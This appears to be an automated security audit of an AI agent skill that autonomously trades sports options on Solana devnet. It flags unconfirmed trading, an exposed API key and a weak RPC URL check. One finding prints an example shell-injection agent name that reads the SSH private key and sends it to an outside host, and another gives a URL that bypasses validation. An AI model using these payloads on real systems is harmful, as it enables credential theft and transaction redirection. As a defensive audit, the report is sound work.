Is gigabit-eth/sports safe?

Every API call in optionns.sh and strategy.py transmits the X-API-Key header plus wallet address, ATA address, game ID, bet type, strike price, and settlement details to https://api.optionns.com, a service operated by the skill author 'digitalhustla'. This means the skill author has full visibility into every registered agent's identity, wallet, and trading behavior. If the server is malicious or compromised, all agent financial data is exposed.

The 'auto' command in optionns.sh and 'auto-async' in strategy.py run indefinitely, scanning all live sports games, computing edge via Kelly Criterion, and executing trades automatically. No confirmation is requested before each trade. A user who installs this skill and runs 'auto' mode hands over financial decision-making to the agent/skill combination without per-transaction oversight.

The cmd_register() function takes an agent_name argument from the command line and interpolates it unsanitized into a double-quoted JSON string passed to curl's -d flag. A crafted agent name containing a double-quote and shell metacharacters could escape the JSON context and inject shell commands. Example: register 'evil"; $(curl http://x.co/$(cat ~/.ssh/id_rsa));"'

optionns.sh loads the Solana private key into the shell variable SOLANA_KEY via: SOLANA_KEY=$(jq -r '.solana_private_key // empty' "$CONFIG_FILE"). Shell environment variables of running processes are accessible via /proc/{pid}/environ to processes with appropriate permissions, making the private key transiently readable by co-resident processes or monitoring tools.

The SKILL.md and README prominently warn 'DEVNET ONLY - DO NOT USE MAINNET WALLETS,' but the skill's own roadmap section states 'Future: Mainnet transition.' This means the architectural pattern for autonomous, unconfirmed financial transactions is being built toward real-money operation. Users who become accustomed to this skill's behavior may be poorly positioned when mainnet capabilities arrive.

signer.py enforces devnet-only operation by checking if any ALLOWED_DEVNET_PATTERNS substring appears in the RPC URL. Because this is a substring check (not a hostname comparison), a URL like https://evil.devnet.solana.com.attacker.com/ passes validation. If an attacker can influence the SOLANA_RPC_URL environment variable (e.g., via another skill or environment manipulation), they can route signed transactions to an arbitrary endpoint.

The cmd_register() function echoes the API key directly to stdout with echo -e "${GREEN}API Key: $api_key${NC}". This key appears in terminal output, shell history, CI/CD logs, and any transcript captured by parent processes or other skills monitoring stdout.

SKILL.md repeatedly frames autonomous operation as a feature: 'agents who never sleep', 'no human required', 'self-registration', '1,000 agents can register in parallel'. While not a prompt injection attack, this framing trains agents and users to expect and accept financial automation without oversight, which undermines safe defaults for agentic financial tools.

The register command has no rate limiting or verification on the agent side, and SKILL.md explicitly documents scalability to 1,000 parallel registrations. This enables platform abuse (Sybil attacks, leaderboard manipulation) and means the skill author's server accumulates large volumes of agent identity data without any consent framework.

The git sparse-checkout install connected only to GitHub (140.82.121.3:443). No connections to api.optionns.com or any third-party host were made during the install phase. The skill does not execute any of its scripts at install time.

Canary reads of .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and gcloud credentials occurred at two points (pre-clone audit timestamp 1771922912.360 and post-install 1771922936.656), consistent with oathe's own baseline and integrity scan phases. The skill's code does not reference these paths. All canary files confirmed intact.